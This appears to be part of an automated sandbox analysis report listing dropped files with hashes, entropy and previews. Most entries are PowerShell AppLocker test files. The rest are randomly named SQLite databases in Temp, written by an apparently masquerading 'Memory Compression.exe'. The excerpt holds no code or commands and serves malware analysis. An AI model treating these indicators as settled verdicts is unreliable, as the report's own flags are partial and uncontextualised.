                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3zxxekh.xri.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cchxeqrk.jsg.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuyxyx2d.ykm.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_df0jb2nc.e4k.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvdn5lpv.qr4.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_frzbqe1m.ner.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hupgybet.3ri.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvp1vft0.how.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5odxtl0.0hs.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oh2cp220.jqm.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbmk5fql.udd.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxaziwai.5ze.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r2slwaha.pfz.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5qjsu0i.05j.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t421t3hl.3br.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2bamopq.gi1.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbtudstk.nlr.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wo0kscew.go3.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcplckr5.nai.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\aU4Lg5KfcF

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\aVrU5jE58E

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\ahJUrfA1F2

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\b6NQEOdx1k

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\bAldbGWNPg

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\bO1H4oGc0Z

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\bsHVgKGF8e

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
